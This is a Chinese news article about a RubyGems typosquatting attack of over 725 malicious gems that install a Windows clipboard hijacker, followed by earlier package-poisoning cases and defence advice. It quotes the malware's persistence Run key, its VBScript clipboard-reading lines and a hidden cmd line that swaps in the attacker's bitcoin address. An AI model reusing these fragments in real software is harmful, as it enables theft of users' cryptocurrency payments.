百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 编程字典 > 正文

RubyGems遭遇供应链投毒攻击窃取比特币,被上传725个恶意软件包

toyiye 2024-09-07 00:44 3 浏览 0 评论

根据安全公司ReversingLabs有关报道,Ruby语言官方模块包代码库RubyGems,被植入了超725个恶意软件包的。根据安全公司ReversingLabs的分析恶意软件包的下载量接近100000次,尽管其中很大一部分可能是脚本自动抓取了存储库中158000个软件包的结果。恶意软件包来自两个用户帐户: " PeterGibbons" 和 "JimCarrey"。


ReversingLabs怀疑这些帐户可能是一个人的工作,他们使用了多种形式的监听行为,冒充正常软件包。例如,"atlas-client"是一个诱骗的诱饵程序包,被2100次下载,用来模仿的"atlas_client"。从2月16日到25日,这两账号共上传了700多个软件包。

攻击流程

根据ReversingLabs分析,这些恶意软件安装后将执行一个脚本,该脚本会拦截在Windows设备上进行的比特币付款。

首先,它使用"%PROGRAMDATA%\Microsoft Essentials\Software Essentials.vbs"路径中的主要恶意循环创建一个新的VBScript Sle保存到本机,然后创建一个新的自动运行注册表项:

"HCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Software Essentials"。

实现重启后的自动运行。

执行"Software Essentials.vbs"恶意脚本时,会启动无限循环,在该循环中,它使用以下代码行捕获用户的剪贴板数据:

Set objHTML = CreateObject("htmlfile")
text = objHTML.ParentWindow.ClipboardData.GetData("text")

然后,脚本将检查剪贴板数据是否与比特币钱包地址的格式匹配。如果是,则使用以下命令在隐藏窗口中将比特币的地址替换为 "1JkU5XdNLji4Ugbb8agEWL1ko5US42nNmc":

WScript.Shell run "C:\Windows\System32\cmd.exe /c echo 1JkU5XdNLji4Ugbb8agEWL1ko5US42nNmc | clip", 0

这样,威胁参与者就试图将所有潜在的加密货币交易重定向到其钱包地址。整个过程如下顺序:

历史事件

无独有偶,这次供应链投毒事件不是第一次,这样事件最近几年来屡见不鲜。对RubyGems也发生了多起。2016年,一名大学生将一个粗略脚本上传到RubyGems,PyPi和NPM,根据对脚本中执行的回访调用统计,该冒名脚本大概在17000个独立IP上执行了大概45000次,其代码成功获取管理权限的有一半。其中还有两个是以.mil结尾的域,表明美军内部的主机也被感染。

此后,类似技术开始流行。2018年,黑客给PyPi中注入了剪贴板劫持脚本。该恶意程序包的名称为"Colourama",名字模仿Colorama。Colorama为Python包仓库中下载量Top 20之一。包括从镜像站点的下载,恶意软件包被下载了171次。

一个月后,有一次攻击者利用NPM植入后门,成功偷到比特币的事件。这次事件中,恶意后门被下载了200万次下,从而使攻击者获得了最后的成功成就。

这些事件表明,针对软件供应链的污染投毒间接攻击已经成了一种常态,这类攻击可能没有直接攻击那样明显,但是针对该类攻击目前还没有有效的防护措施,只能让开发人员擦亮眼睛,对要下载的软件包一定要慎重,可以通过必要的校验方法来保证包合法,比如验证文件包哈希,同时关注安全通报以便出现问题时能及时处理。企业可以通过DevSecOps来保证整个供应链的安全。

相关推荐

# Python 3 # Python 3字典Dictionary(1)

Python3字典字典是另一种可变容器模型,且可存储任意类型对象。字典的每个键值(key=>value)对用冒号(:)分割,每个对之间用逗号(,)分割,整个字典包括在花括号({})中,格式如...

Python第八课:数据类型中的字典及其函数与方法

Python3字典字典是另一种可变容器模型,且可存储任意类型对象。字典的每个键值...

Python中字典详解(python 中字典)

字典是Python中使用键进行索引的重要数据结构。它们是无序的项序列(键值对),这意味着顺序不被保留。键是不可变的。与列表一样,字典的值可以保存异构数据,即整数、浮点、字符串、NaN、布尔值、列表、数...

Python3.9又更新了:dict内置新功能,正式版十月见面

机器之心报道参与:一鸣、JaminPython3.8的热乎劲还没过去,Python就又双叒叕要更新了。近日,3.9版本的第四个alpha版已经开源。从文档中,我们可以看到官方透露的对dic...

Python3 基本数据类型详解(python三种基本数据类型)

文章来源:加米谷大数据Python中的变量不需要声明。每个变量在使用前都必须赋值,变量赋值以后该变量才会被创建。在Python中,变量就是变量,它没有类型,我们所说的"类型"是变...

一文掌握Python的字典(python字典用法大全)

字典是Python中最强大、最灵活的内置数据结构之一。它们允许存储键值对,从而实现高效的数据检索、操作和组织。本文深入探讨了字典,涵盖了它们的创建、操作和高级用法,以帮助中级Python开发...

超级完整|Python字典详解(python字典的方法或操作)

一、字典概述01字典的格式Python字典是一种可变容器模型,且可存储任意类型对象,如字符串、数字、元组等其他容器模型。字典的每个键值key=>value对用冒号:分割,每个对之间用逗号,...

Python3.9版本新特性:字典合并操作的详细解读

处于测试阶段的Python3.9版本中有一个新特性:我们在使用Python字典时,将能够编写出更可读、更紧凑的代码啦!Python版本你现在使用哪种版本的Python?3.7分?3.5分?还是2.7...

python 自学,字典3(一些例子)(python字典有哪些基本操作)

例子11;如何批量复制字典里的内容2;如何批量修改字典的内容3;如何批量修改字典里某些指定的内容...

Python3.9中的字典合并和更新,几乎影响了所有Python程序员

全文共2837字,预计学习时长9分钟Python3.9正在积极开发,并计划于今年10月发布。2月26日,开发团队发布了alpha4版本。该版本引入了新的合并(|)和更新(|=)运算符,这个新特性几乎...

Python3大字典:《Python3自学速查手册.pdf》限时下载中

最近有人会想了,2022了,想学Python晚不晚,学习python有前途吗?IT行业行业薪资高,发展前景好,是很多求职群里严重的香饽饽,而要进入这个高薪行业,也不是那么轻而易举的,拿信工专业的大学生...

python学习——字典(python字典基本操作)

字典Python的字典数据类型是基于hash散列算法实现的,采用键值对(key:value)的形式,根据key的值计算value的地址,具有非常快的查取和插入速度。但它是无序的,包含的元素个数不限,值...

324页清华教授撰写【Python 3 菜鸟查询手册】火了,小白入门字典

如何入门学习python...

Python3.9中的字典合并和更新,了解一下

全文共2837字,预计学习时长9分钟Python3.9正在积极开发,并计划于今年10月发布。2月26日,开发团队发布了alpha4版本。该版本引入了新的合并(|)和更新(|=)运算符,这个新特性几乎...

python3基础之字典(python中字典的基本操作)

字典和列表一样,也是python内置的一种数据结构。字典的结构如下图:列表用中括号[]把元素包起来,而字典是用大括号{}把元素包起来,只不过字典的每一个元素都包含键和值两部分。键和值是一一对应的...

取消回复欢迎 发表评论:

请填写验证码